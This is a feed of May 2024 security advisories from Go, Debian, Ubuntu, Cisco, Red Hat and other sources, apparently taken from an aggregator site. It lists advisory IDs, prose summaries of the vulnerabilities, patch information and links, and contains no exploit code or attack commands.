17.05.2024 22:37:01	go	[GO-2024-2574] Insecure CORS Configuration allowing wildcard origin with credentials ingithub.com/gofiber/fiber/v2	The CORS middleware allows for insecure configurations that could potentiallyexpose the application to multiple CORS-related vulnerabilities. Specifically,it allows setting the Access-Control-Allow-Origin header to a wildcard ("*")while also having the Access-Control-Allow-Credentials set to true, which goesagainst recommended security best practices.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2574
17.05.2024 22:28:30	go	[GO-2024-2694] Potential Reentrancy using Timeout Callbacks in ibc-hooks ingithub.com/cosmos/ibc-go		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2694
17.05.2024 22:04:39	go	[GO-2024-2702] Code injection vulnerability in github.com/flipped-aurora/gin-vue-admin/server	Gin-vue-admin has a code injection vulnerability in the backend. In the PluginSystem -> Plugin Template feature, an attacker can perform directory traversalby manipulating the 'plugName' parameter. They can create specific folders suchas 'api', 'config', 'global', 'model', 'router', 'service', and 'main.go'function within the specified traversal directory. Moreover, the Go files withinthese folders can have arbitrary code inserted based on a specific PoCparameter.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2702
17.05.2024 21:57:37	go	[GO-2024-2842] Unexpected authenticated registry accesses in github.com/containers/image/v5	An attacker may trigger unexpected authenticated registry accesses on behalf ofa victim user, causing resource exhaustion, local path traversal, and otherattacks.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2842
17.05.2024 20:15:07	alpinelinux	[ALPINE:CVE-2024-35190] asterisk vulnerability	[From CVE-2024-35190] Asterisk is an open source private branch exchange and telephony toolkit. After upgrade to 18.23.0, ALL unauthorized SIP requests are identified as PJSIP Endpoint of local asterisk server. This vulnerability is fixed in 18.23.1, 20.8.1, and 21.3.1.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-35190
17.05.2024 03:00:00	debian	[DSA-5693-1] thunderbird	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5693-1
17.05.2024 03:00:00	debian	[DSA-5694-1] chromium	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5694-1
21.05.2024 10:56:50	almalinux	[ALSA-2024:2883] firefox security update (important)	firefox security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:2883
21.05.2024 10:54:53	almalinux	[ALSA-2024:2888] thunderbird security update (important)	thunderbird security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:2888
17.05.2024 03:00:00	freebsd	[FREEBSD:B88AA380-1442-11EF-A490-84A93843EB75] OpenSSL -- Denial of Service vulnerability	The OpenSSL project reports: Excessive time spent checking DSA keys and parameters (Low) Checking excessively long DSA keys or parameters may be very slow.	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:B88AA380-1442-11EF-A490-84A93843EB75
17.05.2024 03:00:00	freebsd	[FREEBSD:A431676C-F86C-4371-B48A-B7D2B0BEC3A3] electron29 -- setuid() does not affect libuv's internal io_uring	Electron developers report: This update fixes the following vulnerability: Backported fix for CVE-2024-22017.	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:A431676C-F86C-4371-B48A-B7D2B0BEC3A3
18.05.2024 03:00:00	freebsd	[FREEBSD:F393B5A7-1535-11EF-8064-C5610A6EFFFB] Arti -- Security issues related to circuit construction	Tor Project reports: When building anonymizing circuits to or from an onion service with 'lite' vanguards (the default) enabled, the circuit manager code would build the circuits with one hop too few. When 'full' vanguards are enabled, some circuits are supposed to be built with an extra hop to minimize the linkability of the guard nodes. In some circumstances, the circuit manager would build circuits with one hop too few, making it easier for an adversary to discover the L2 and L3 guards of the affected clients and services.	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:F393B5A7-1535-11EF-8064-C5610A6EFFFB
22.05.2024 01:39:36	ubuntu	[USN-6775-2] Linux kernel vulnerabilities (medium)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6775-2
22.05.2024 01:34:49	ubuntu	[USN-6777-3] Linux kernel (GCP) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6777-3
21.05.2024 21:09:58	npm	[NPM:GHSA-PJ27-2XVP-4QXG] @fastify/session reuses destroyed session cookie (high)	### ImpactWhen restoring the cookie from the session store, the `expires` field is overriden if the `maxAge` field was set.This means a cookie is never correctly detected as expired and thus expired sessions are not destroyed.### PatchesUpdating to v10.9.0 will solve this.### WorkaroundsNone### ReferencesPublicly reported at: https://github.com/fastify/session/issues/251	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-PJ27-2XVP-4QXG
21.05.2024 16:56:05	ubuntu	[USN-6780-1] idna vulnerability	idna could be made to consume significant resources if it receives a specially crafted input.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6780-1
21.05.2024 16:21:26	ubuntu	[USN-6781-1] Spreadsheet::ParseExcel vulnerability (high)	Spreadsheet::ParseExcel could possibly run commands if it processed a specially crafted file.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6781-1
22.05.2024 22:15:13	go	[GO-2024-2571] Vesting account creation on blocked address in cosmossdk.io/x/auth		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2571
22.05.2024 22:33:26	maven	[MAVEN:GHSA-9RRW-82R2-623P] Silverpeas Core vulnerable to Cross Site Scripting (moderate)	Silverpeas Core 6.3 is vulnerable to Cross Site Scripting (XSS) via ClipboardSessionController.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-9RRW-82R2-623P
22.05.2024 22:42:50	npm	[NPM:GHSA-XGWH-CGV9-783V] Ghost allows CSV Injection during member CSV export (high)	Ghost before 5.82.0 allows CSV Injection during a member CSV export.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-XGWH-CGV9-783V
22.05.2024 19:00:00	cisco	[CISCO-SA-FMC-SQLI-WFFDNNOS] Cisco Firepower Management Center Software SQL Injection Vulnerability (high)	A vulnerability in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an authenticated, remote attacker to conduct SQL injection attacks on an affected system.This vulnerability exists because the web-based management interface does not adequately validate user input. An attacker could exploit this vulnerability by authenticating to the application and sending crafted SQL queries to an affected system. A successful exploit could allow the attacker to obtain any data from the database, execute arbitrary commands on the underlying operating system, and elevate privileges to root. To exploit this vulnerability, an attacker would need at least Read Only user credentials.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the May 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: May 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75298"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-FMC-SQLI-WFFDNNOS
22.05.2024 19:00:00	cisco	[CISCO-SA-SNORT3-IPS-BYPASS-UE69KBMD] Multiple Cisco Products Snort 3 HTTP Intrusion Prevention System Rule Bypass Vulnerability (medium)	Multiple Cisco products are affected by a vulnerability in the Snort Intrusion Prevention System (IPS) rule engine that could allow an unauthenticated, remote attacker to bypass the configured rules on an affected system.This vulnerability is due to incorrect HTTP packet handling. An attacker could exploit this vulnerability by sending crafted HTTP packets through an affected device. A successful exploit could allow the attacker to bypass configured IPS rules and allow uninspected traffic onto the network.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the May 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: May 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75298"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-SNORT3-IPS-BYPASS-UE69KBMD
22.05.2024 19:00:00	cisco	[CISCO-SA-FTD-ARCHIVE-BYPASS-Z4WQJWCN] Cisco Firepower Threat Defense Software Encrypted Archive File Policy Bypass Vulnerability (medium)	A vulnerability in the file policy feature that is used to inspect encrypted archive files of Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to bypass a configured file policy to block an encrypted archive file.This vulnerability exists because of a logic error when a specific class of encrypted archive files is inspected. An attacker could exploit this vulnerability by sending a crafted, encrypted archive file through the affected device. A successful exploit could allow the attacker to send an encrypted archive file, which could contain malware and should have been blocked and dropped at the Cisco FTD device.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the May 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: May 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75298"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-FTD-ARCHIVE-BYPASS-Z4WQJWCN
22.05.2024 19:00:00	cisco	[CISCO-SA-FMC-OBJECT-BYPASS-FTH8TDJQ] Cisco Firepower Management Center Software Object Group Access Control List Bypass Vulnerability (medium)	A vulnerability in the Object Groups for Access Control Lists (ACLs) feature of Cisco Firepower Management Center (FMC) Software could allow an unauthenticated, remote attacker to bypass configured access controls on managed devices that are running Cisco Firepower Threat Defense (FTD) Software.This vulnerability is due to the incorrect deployment of the Object Groups for ACLs feature from Cisco FMC Software to managed FTD devices in high-availability setups. After an affected device is rebooted following Object Groups for ACLs deployment, an attacker can exploit this vulnerability by sending traffic through the affected device. A successful exploit could allow the attacker to bypass configured access controls and successfully send traffic to devices that are expected to be protected by the affected device.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the May 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: May 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75298"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-FMC-OBJECT-BYPASS-FTH8TDJQ
22.05.2024 19:00:00	cisco	[CISCO-SA-ASAFTD-SAML-BYPASS-KKNVXYKW] Cisco Adaptive Security Appliance and Firepower Threat Defense Software Authorization Bypass Vulnerability (medium)	A vulnerability in the implementation of SAML 2.0 single sign-on (SSO) for remote access VPN services in Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, remote attacker to successfully establish a VPN session on an affected device.This vulnerability is due to improper separation of authorization domains when using SAML authentication. An attacker could exploit this vulnerability by using valid credentials to successfully authenticate using their designated connection profile (tunnel group), intercepting the SAML SSO token that is sent back from the Cisco ASA device, and then submitting the same SAML SSO token to a different tunnel group for authentication. A successful exploit could allow the attacker to establish a remote access VPN session using a connection profile that they are not authorized to use and connect to secured networks behind the affected device that they are not authorized to access. For successful exploitation, the attacker must have valid remote access VPN user credentials.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the May 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: May 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75298"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASAFTD-SAML-BYPASS-KKNVXYKW
22.05.2024 19:00:00	cisco	[CISCO-SA-ASAFTD-OGSNSG-ACLBYP-3XB8Q6JX] Cisco Adaptive Security Appliance and Firepower Threat Defense Software Inactive-to-Active ACL Bypass Vulnerability (medium)	A vulnerability in the activation of an access control list (ACL) on Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to bypass the protection that is offered by a configured ACL on an affected device.This vulnerability is due to a logic error that occurs when an ACL changes from inactive to active in the running configuration of an affected device. An attacker could exploit this vulnerability by sending traffic through the affected device that should be denied by the configured ACL. The reverse condition is also true—traffic that should be permitted could be denied by the configured ACL. A successful exploit could allow the attacker to bypass configured ACL protections on the affected device, allowing the attacker to access trusted networks that the device might be protecting.Note: This vulnerability applies to both IPv4 and IPv6 traffic as well as dual-stack ACL configurations in which both IPv4 and IPv6 ACLs are configured on an interface.Cisco has released software updates that address this vulnerability. There is a workaround that addresses this vulnerability.This advisory is part of the May 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: May 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75298"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASAFTD-OGSNSG-ACLBYP-3XB8Q6JX
22.05.2024 18:02:15	go	[GO-2024-2870] Credential leakage in github.com/aquasecurity/trivy (medium)	A malicious registry can cause Trivy to leak credentials for legitimateregistries such as AWS Elastic Container Registry (ECR), Google CloudArtifact/Container Registry, or Azure Container Registry (ACR) if the registryis scanned from directly using Trivy. These tokens can then be used to push/pullimages from those registries to which the identity/user running Trivy hasaccess. This vulnerability only applies when scanning container images directlyfrom a registry. If you use Docker, containerd or other runtime to pull imageslocally and scan them with Trivy, you are not affected. To enforce thisbehavior, you can use the --image-src flag to select which sources you trust.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2870
22.05.2024 08:06:43	ubuntu	[USN-6782-1] Thunderbird vulnerabilities	Several security issues were fixed in Thunderbird.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6782-1
22.05.2024 03:00:00	debian	[DSA-5695-1] webkit2gtk	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5695-1
22.05.2024 03:00:00	debian	[DSA-5696-1] chromium	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5696-1
22.05.2024 03:00:00	redhat	[RHSA-2024:2950] kernel-rt security and bug fix update (moderate)	The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.Security Fix(es):For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2950
22.05.2024 03:00:00	redhat	[RHSA-2024:2966] ghostscript security update (low)	The Ghostscript suite contains utilities for rendering PostScript and PDF documents. Ghostscript translates PostScript code to common bitmap formats so that the code can be displayed or printed.Security Fix(es):* ghostscript: Divide by zero in eps_print_page in gdevepsn.c (CVE-2020-21710)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2966
22.05.2024 03:00:00	redhat	[RHSA-2024:2974] libXpm security update (moderate)	X.Org X11 libXpm runtime library.Security Fix(es):* libXpm: out of bounds read in XpmCreateXpmImageFromBuffer() (CVE-2023-43788)* libXpm: out of bounds read on XPM with corrupted colormap (CVE-2023-43789)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2974
22.05.2024 03:00:00	redhat	[RHSA-2024:2979] poppler security update (moderate)	Poppler is a Portable Document Format (PDF) rendering library, used by applications such as Evince.Security Fix(es):* poppler: NULL pointer dereference in `FoFiType1C::convertToType1` (CVE-2020-36024)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2979
22.05.2024 03:00:00	redhat	[RHSA-2024:2980] harfbuzz security update (moderate)	HarfBuzz is an implementation of the OpenType Layout engine.Security Fix(es):* harfbuzz: allows attackers to trigger O(n^2) growth via consecutive marks (CVE-2023-25193)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2980
22.05.2024 03:00:00	redhat	[RHSA-2024:2986] python3.11-urllib3 security update (moderate)	The python-urllib3 package provides the Python HTTP module with connection pooling and file POST abilities.Security Fix(es):* python-urllib3: Cookie request header isn't stripped during cross-origin redirects (CVE-2023-43804)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2986
22.05.2024 03:00:00	redhat	[RHSA-2024:2994] LibRaw security update (moderate)	LibRaw is a library for reading RAW files obtained from digital photo cameras (CRW/CR2, NEF, RAF, DNG, and others).Security Fix(es):* LibRaw: stack buffer overflow in LibRaw_buffer_datastream::gets() in src/libraw_datastream.cpp (CVE-2021-32142)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2994
22.05.2024 03:00:00	redhat	[RHSA-2024:3030] libsndfile security update (moderate)	libsndfile is a C library for reading and writing files containing sampled sound, such as AIFF, AU, or WAV. Security Fix(es):* libsndfile: integer overflow in src/mat4.c and src/au.c leads to DoS (CVE-2022-33065)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3030
22.05.2024 03:00:00	redhat	[RHSA-2024:3043] ansible-core bug fix, enhancement, and security update (moderate)	Ansible is a radically simple model-driven configuration management, multi-node deployment, and remote task execution system. Ansible works over SSH and does not require any software or daemons to be installed on remote nodes. Extension modules can be written in any language and are transferred to managed machines automatically.Security Fix(es):* ansible-core: possible information leak in tasks that ignore ANSIBLE_NO_LOG configuration (CVE-2024-0690)Bug Fix(es):* Update ansible-core to 2.16.3 (JIRA:RHEL-23782)* Rebuild ansible-core with python 3.12 (JIRA:RHEL-24141)	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3043
22.05.2024 03:00:00	redhat	[RHSA-2024:3044] idm:DL1 security update (moderate)	Red Hat Identity Management (IdM) is a centralized authentication, identity management, and authorization solution for both traditional and cloud-based enterprise environments. Security Fix(es):* freeipa: specially crafted HTTP requests potentially lead to denial of service (CVE-2024-1481)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3044
22.05.2024 03:00:00	redhat	[RHSA-2024:3049] perl-Convert-ASN1 security update (moderate)	Convert::ASN1 encodes and decodes ASN.1 data structures using BER/DER rules.Security Fix(es):* perl-Convert-ASN1: allows remote attackers to cause an infinite loop via unexpected input (CVE-2013-7488)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3049
22.05.2024 03:00:00	redhat	[RHSA-2024:3056] qt5-qtbase security update (moderate)	Qt is a software toolkit for developing applications. The qt5-base packages contain base tools for string, xml, and network handling in Qt. Security Fix(es):* qt: incorrect integer overflow check (CVE-2023-51714)* qtbase: potential buffer overflow when reading KTX images (CVE-2024-25580)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3056
22.05.2024 03:00:00	redhat	[RHSA-2024:3059] libtiff security update (moderate)	The libtiff packages contain a library of functions for manipulating Tagged Image File Format (TIFF) files.Security Fix(es):* libtiff: out-of-bounds read in tiffcp in tools/tiffcp.c (CVE-2022-4645)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3059
22.05.2024 03:00:00	redhat	[RHSA-2024:2952] resource-agents security and bug fix update (moderate)	The resource-agents packages provide the Pacemaker and RGManager service managers with a set of scripts. These scripts interface with several services to allow operating in a high-availability (HA) environment.Security Fix(es):* urllib3: Request body not stripped after redirect from 303 status changes request method to GET (CVE-2023-45803)* pycryptodome: side-channel leakage for OAEP decryption in PyCryptodome and pycryptodomex (CVE-2023-52323)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2952
22.05.2024 03:00:00	redhat	[RHSA-2024:2953] pcs security update (moderate)	The pcs packages provide a command-line configuration system for the Pacemaker and Corosync utilities.Security Fix(es):* rubygem-rack: Denial of Service Vulnerability in Rack Content-Type Parsing (CVE-2024-25126)* rubygem-rack: Possible DoS Vulnerability with Range Header in Rack (CVE-2024-26141)* rubygem-rack: Possible Denial of Service Vulnerability in Rack Header Parsing (CVE-2024-26146)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2953
22.05.2024 03:00:00	redhat	[RHSA-2024:2961] Image builder components bug fix, enhancement and security update (moderate)	Image Builder is a service for building customized OS artifacts, such as VM images and OSTree commits, that uses osbuild under the hood.Security Fix(es):* osbuild-composer: race condition may disable GPG verification for package repositories (CVE-2024-2307)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2961
22.05.2024 03:00:00	redhat	[RHSA-2024:2962] virt:rhel and virt-devel:rhel security and enhancement update (moderate)	Kernel-based Virtual Machine (KVM) offers a full virtualization solution for Linux on numerous hardware platforms. The virt:rhel module contains packages which provide user-space components used to run virtual machines using KVM. The packages also provide APIs for managing and interacting with the virtualized systems.Security Fix(es):* QEMU: VNC: infinite loop in inflate_buffer() leads to denial of service (CVE-2023-3255)* QEMU: improper IDE controller reset can lead to MBR overwrite (CVE-2023-5088)* QEMU: VNC: NULL pointer dereference in qemu_clipboard_request() (CVE-2023-6683)* QEMU: virtio-net: stack buffer overflow in virtio_net_flush_tx() (CVE-2023-6693)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2962
22.05.2024 03:00:00	redhat	[RHSA-2024:2968] fence-agents security and bug fix update (moderate)	The fence-agents packages provide a collection of scripts for handling remote power management for cluster devices. They allow failed or unreachable nodes to be forcibly restarted and removed from the cluster. Security Fix(es):* urllib3: Request body not stripped after redirect from 303 status changes request method to GET (CVE-2023-45803)* pycryptodome: side-channel leakage for OAEP decryption in PyCryptodome and pycryptodomex (CVE-2023-52323)* jinja2: HTML attribute injection when passing user input as keys to xmlattr filter (CVE-2024-22195)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2968
22.05.2024 03:00:00	redhat	[RHSA-2024:3061] pki-core:10.6 and pki-deps:10.6 security update (moderate)	The Public Key Infrastructure (PKI) Core contains fundamental packages required by Red Hat Certificate System.Security Fix(es):* jackson-databind: denial of service via a large depth of nested objects (CVE-2020-36518)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3061
22.05.2024 03:00:00	redhat	[RHSA-2024:3066] exempi security update (moderate)	Exempi provides a library for easy parsing of XMP metadata.Security Fix(es):* exempi: denial of service via opening of crafted audio file with ID3V2 frame (CVE-2020-18651)* exempi: denial of service via opening of crafted webp file (CVE-2020-18652)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3066
22.05.2024 03:00:00	redhat	[RHSA-2024:3094] perl-CPAN security update (moderate)	The CPAN module is a tool to query, download and build perl modules from CPAN sites.Security Fix(es):* perl: CPAN.pm does not verify TLS certificates when downloading distributions over HTTPS (CVE-2023-31484)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3094
22.05.2024 03:00:00	redhat	[RHSA-2024:3121] httpd:2.4 security update (moderate)	The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.Security Fix(es):* httpd: mod_macro: out-of-bounds read vulnerability (CVE-2023-31122)* mod_http2: reset requests exhaust memory (incomplete fix of CVE-2023-44487) (CVE-2023-45802)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3121
22.05.2024 03:00:00	redhat	[RHSA-2024:2973] libX11 security update (moderate)	The libX11 packages contain the core X11 protocol client library.Security Fix(es):* libX11: out-of-bounds memory access in _XkbReadKeySyms() (CVE-2023-43785)* libX11: stack exhaustion from infinite recursion in PutSubImage() (CVE-2023-43786)* libX11: integer overflow in XCreateImage() leading to a heap overflow (CVE-2023-43787)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2973
22.05.2024 03:00:00	redhat	[RHSA-2024:2981] frr security update (moderate)	FRRouting is free software that manages TCP/IP based routing protocols. It supports BGP4, OSPFv2, OSPFv3, ISIS, RIP, RIPng, PIM, NHRP, PBR, EIGRP and BFD. Security Fix(es):* frr: missing length check in bgp_attr_psid_sub() can lead do DoS (CVE-2023-31490)* frr: processes invalid NLRIs if attribute length is zero (CVE-2023-41358)* frr: NULL pointer dereference in bgp_nlri_parse_flowspec() in bgpd/bgp_flowspec.c (CVE-2023-41909)* frr: mishandled malformed data leading to a crash (CVE-2023-46752)* frr: crafted BGP UPDATE message leading to a crash (CVE-2023-46753)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2981
22.05.2024 03:00:00	redhat	[RHSA-2024:2982] webkit2gtk3 security update (important)	WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform.Security Fix(es):* webkitgtk: Processing web content may lead to arbitrary code execution (CVE-2023-40414)* webkitgtk: Processing web content may lead to arbitrary code execution (CVE-2023-42852)* webkitgtk: Processing web content may lead to arbitrary code execution (CVE-2024-23213)* webkitgtk: Processing a file may lead to a denial of service or potentially disclose memory contents (CVE-2014-1745)* webkitgtk: User password may be read aloud by a text-to-speech accessibility feature (CVE-2023-32359)* webkitgtk: use-after-free in the MediaRecorder API of the WebKit GStreamer-based ports (CVE-2023-39928)* webkitgtk: Processing web content may lead to a denial of service (CVE-2023-41983)* webkitgtk: processing a malicious image may lead to a denial of service (CVE-2023-42883)* webkitgtk: processing malicious web content may lead to arbitrary code execution (CVE-2023-42890)* webkitgtk: A maliciously crafted webpage may be able to fingerprint the user (CVE-2024-23206)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the 